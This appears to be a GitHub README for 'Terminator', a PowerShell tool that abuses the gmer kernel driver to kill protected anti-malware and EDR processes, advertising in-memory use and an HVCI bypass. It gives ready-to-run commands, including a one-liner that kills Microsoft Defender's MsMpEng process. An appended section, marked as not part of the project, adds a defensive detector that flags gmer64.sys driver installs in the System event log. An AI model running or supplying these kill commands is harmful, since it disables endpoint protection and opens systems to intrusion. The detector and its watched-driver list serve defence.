/Terminator

PowerShell script to terminate protected processes such as anti-malware and EDRs.

Primary language: PowerShell. License: GNU General Public License v3.0 (GPL-3.0)

Invoke-Terminator


Terminator is a PowerShell script that terminates protected processes, such as anti-malware and EDRs, through the gmer driver.

  • in-memory
  • HVCI bypass

Usage

<#
----------------------------
        Terminator

github : github.com/xiosec
twitter: twitter.com/xiosec
----------------------------

* Arguments
    * -ServiceName
    * -ProcName
    * -ProcId
    * -driverPath
    * -AutoKill
#>

Invoke-Terminator -ServiceName terminator -ProcName MsMpEng 

inline

powershell -c ". .\Invoke-Terminator.ps1; Invoke-Terminator -ProcName MsMpEng -AutoKill"

Example

In this example, we kill the MsMpEng process, which is related to the antimalware service.
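
A defender-side check for the behaviour this README describes, as an added example that is not part of the Terminator project: it flags kernel-driver service installs (System log, event 7045) whose image is gmer64.sys. It assumes the script registers the driver as a service, which the -ServiceName and -driverPath arguments suggest; the function names and sample records are constructed for illustration.

```powershell
# Added example, not from the Terminator project.
# Turns a Service Control Manager 7045 event into a flat record.
function ConvertFrom-ServiceInstallEvent {
    param([Parameter(Mandatory, ValueFromPipeline)] $LogRecord)
    process {
        [pscustomobject]@{
            ServiceName = $LogRecord.Properties[0].Value
            ImagePath   = $LogRecord.Properties[1].Value
            ServiceType = $LogRecord.Properties[2].Value
        }
    }
}

# Returns the records that install a kernel driver whose file name is watched.
function Find-WatchedDriverInstall {
    param(
        [Parameter(Mandatory)] [object[]] $Record,
        [string[]] $WatchedDriver = @('gmer64.sys')   # file name taken from this page
    )
    foreach ($r in $Record) {
        # 7045 reports "kernel mode driver" on English-language systems
        if ($r.ServiceType -notmatch 'kernel') { continue }
        # ImagePath may be quoted or carry the \??\ prefix; compare the leaf name only
        $leaf = ($r.ImagePath.Trim('"') -split '[\\/]')[-1]
        if ($WatchedDriver -contains $leaf) {          # -contains is case-insensitive
            [pscustomobject]@{
                ServiceName = $r.ServiceName
                ImagePath   = $r.ImagePath
                Driver      = $leaf
            }
        }
    }
}

# Constructed sample records (not real telemetry); the paths are made up and
# the first service name mirrors the usage line above.
$sample = @(
    [pscustomobject]@{ ServiceName = 'terminator'; ImagePath = '\??\C:\Users\Public\gmer64.sys'; ServiceType = 'kernel mode driver' }
    [pscustomobject]@{ ServiceName = 'ExampleUpdater'; ImagePath = '"C:\Program Files\Example\updater.exe"'; ServiceType = 'user mode service' }
)
Find-WatchedDriverInstall -Record $sample | Format-List   # only the first record is reported

# Against a live host:
# Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045 } |
#     ConvertFrom-ServiceInstallEvent |
#     ForEach-Object { Find-WatchedDriverInstall -Record $_ }
```

A file-name match misses a renamed copy of the driver; Sysmon Event ID 6 (driver loaded) records the hash and signer, which are stronger keys for the same check.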

Links

gmer64.sys

Blackout

License

Released under GPL-3.0 by @xiosec